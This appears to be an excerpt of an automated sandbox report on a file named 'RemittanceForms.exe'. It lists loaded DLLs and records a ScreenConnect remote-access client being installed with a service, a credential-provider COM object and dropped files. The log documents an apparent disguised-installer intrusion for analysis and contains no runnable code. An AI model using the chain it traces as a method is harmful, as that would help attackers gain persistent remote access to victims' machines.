                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: apphelp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: mscoree.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: urlmon.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: iertutil.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: srvcli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: netutils.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: sspicli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: wldp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: propsys.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: profapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dpapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: amsi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: userenv.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: msasn1.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: gpapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winsta.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: mswsock.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: netapi32.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dnsapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: samcli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: samlib.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winnsi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasapi32.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rasman.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: rtutils.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: winhttp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ntmarta.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: wldp.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: profapi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: amsi.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: userenv.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: netutils.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: sspicli.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: propsys.dll
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dll
                      Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: mscoree.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: wldp.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: amsi.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: userenv.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: profapi.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: version.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: msasn1.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: gpapi.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: propsys.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: edputil.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: netutils.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: appresolver.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: bcp47langs.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: slc.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: sppc.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Users\user\Downloads\RemittanceForms (1).exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textshaping.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msihnd.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pcacli.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Downloads\RemittanceForms.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

                      Persistence and Installation Behavior

                      barindex
                      Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                      Source: c:\program files (x86)\screenconnect client (484f9eed1d8e13b9)\screenconnect.windowscredentialprovider.dllCOM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-3a73-5ac4396425a8}\inprocserver32
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE165.tmpJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\e9437aa8-b71a-4549-a9b9-7890db2aa232.tmpJump to dropped file
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmpJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.Windows.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.Core.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exeJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\05921837-fe71-4e65-9600-6a9e2f65e922.tmpJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\MSID5DB.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\Unconfirmed 804247.crdownloadJump to dropped file
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE165.tmpJump to dropped file
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                      Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (484f9eed1d8e13b9)
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
